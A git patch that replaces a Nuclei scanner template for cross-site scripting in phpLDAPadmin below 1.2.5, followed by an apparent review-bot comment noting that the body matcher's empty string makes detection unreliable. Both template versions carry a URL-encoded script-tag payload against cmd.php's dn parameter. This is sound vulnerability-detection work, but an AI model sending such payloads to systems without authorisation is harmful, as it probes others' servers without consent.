From 9c29ff3819e44bd45142e2a694f876dcbb4a16bc Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 12 Sep 2023 14:54:31 +0530
Subject: [PATCH] complete template update

---
 custom-phpldapadmin-xss | 16 -------
 .../other/phpldapadmin-xss.yaml | 47 +++++++++++++++++++
 2 files changed, 47 insertions(+), 16 deletions(-)
 delete mode 100644 custom-phpldapadmin-xss
 create mode 100644 http/vulnerabilities/other/phpldapadmin-xss.yaml

diff --git a/custom-phpldapadmin-xss b/custom-phpldapadmin-xss
deleted file mode 100644
index 44908e3582..0000000000
--- a/custom-phpldapadmin-xss
+++ /dev/null
@@ -1,16 +0,0 @@
-id: custom-phpldapadmin-xss
-info:
-  name: Custom PHP LDAP Admin XSS Detection
-  author: GodfatherOrwa, herry
-  Reference : https://twitter.com/GodfatherOrwa/status/1701392754251563477
-  severity: medium
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/phpldapadmin/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1"
-    matchers:
-      - type: word
-        words:
-          - ""
-        part: body
diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml
new file mode 100644
index 0000000000..2577f1202d
--- /dev/null
+++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml
@@ -0,0 +1,47 @@
+id: phpldapadmin-xss
+
+info:
+  name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
+  author: GodfatherOrwa,herry
+  severity: medium
+  reference:
+    - https://twitter.com/GodfatherOrwa/status/1701392754251563477
+  metadata:
+    max-request: 3
+    verified: true
+    shodan-query: html:"phpLDAPadmin"
+  tags: php,phpldapadmin,xss
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
+      - "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"
+
+    attack: pitchfork
+    payloads:
+      path:
+        -
+        - /htdocs/index.php
+        - /phpldapadmin
+
+    stop-at-first-match: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - ""
+          - "No such entry"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
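Review bot: The first word of the body matcher on the new side is an empty string, which every response contains, so under `condition: and` the detection reduces to `"No such entry"` plus a `text/html` 200 — a response phpLDAPadmin likely returns for any nonexistent DN whether or not the `dn` value is reflected unescaped, which would make the template fire on patched instances too. If that entry was the reflected payload and was lost in rendering, it should read `- "<script>alert(document.domain)</script>"` (the decoded payload from the cmd.php path), since the unescaped reflection is what actually demonstrates the injection. Separately, the first `path` payload is a bare `-` (YAML null) rather than `""`; if nuclei renders a null payload as anything other than an empty string, the base-path probe of `{{BaseURL}}{{path}}/cmd.php` is mis-built, so `- ""` is the safer spelling.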